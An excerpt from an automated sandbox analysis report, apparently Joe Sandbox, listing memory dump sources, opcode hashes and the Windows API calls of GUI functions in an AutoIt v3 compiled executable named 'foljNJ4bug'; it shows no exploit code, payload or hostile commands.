                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                              • Instruction ID: 67d5ee8099d40a11ac0c214ab943c9917da0bc9dbedf7b1bdae511ba7c7c5a4c
                                                                                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                              • Instruction Fuzzy Hash: 5241D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                              • Instruction ID: fa2a09b13c7aa33c1c3dc2226ea382650277d539735ebc3caae15bd27938749d
                                                                                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                              • Instruction Fuzzy Hash: 6A018078A01109EFCB44DF98C5909AEFBF9FB48310B208599E949A7701E730AE41DF80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                              • Instruction ID: cc96afcccf924ccc45f95a789448f61d59f6924361f74d5614197e61c6486e48
                                                                                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                              • Instruction Fuzzy Hash: 24014278A01109EFCB44DF98C5909AEFBF9FB48311F608599E959A7741E730AE41DF80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2158942596.0000000004037000.00000040.00000020.00020000.00000000.sdmp, Offset: 04037000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4037000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                              APIs
                                                                                                                                              • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                                              • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                                              • _wcslen.LIBCMT ref: 00459916
                                                                                                                                              • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                                              • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                              • API String ID: 4040870279-2373415609
                                                                                                                                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                              APIs
                                                                                                                                              • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                              • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                              • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 69173610-0
                                                                                                                                              • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                              • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                              • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                              • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                              • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                              • API String ID: 2910397461-517079104
                                                                                                                                              • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                              • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                              • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                              • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                              • API String ID: 1038674560-3360698832
                                                                                                                                              • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                              • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                              • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                              • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                                              APIs
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                              • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                              • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                              • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                              • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                              • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cursor$Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1675784387-0
                                                                                                                                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                              APIs
                                                                                                                                              • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                              • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                              • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                              • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                              • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
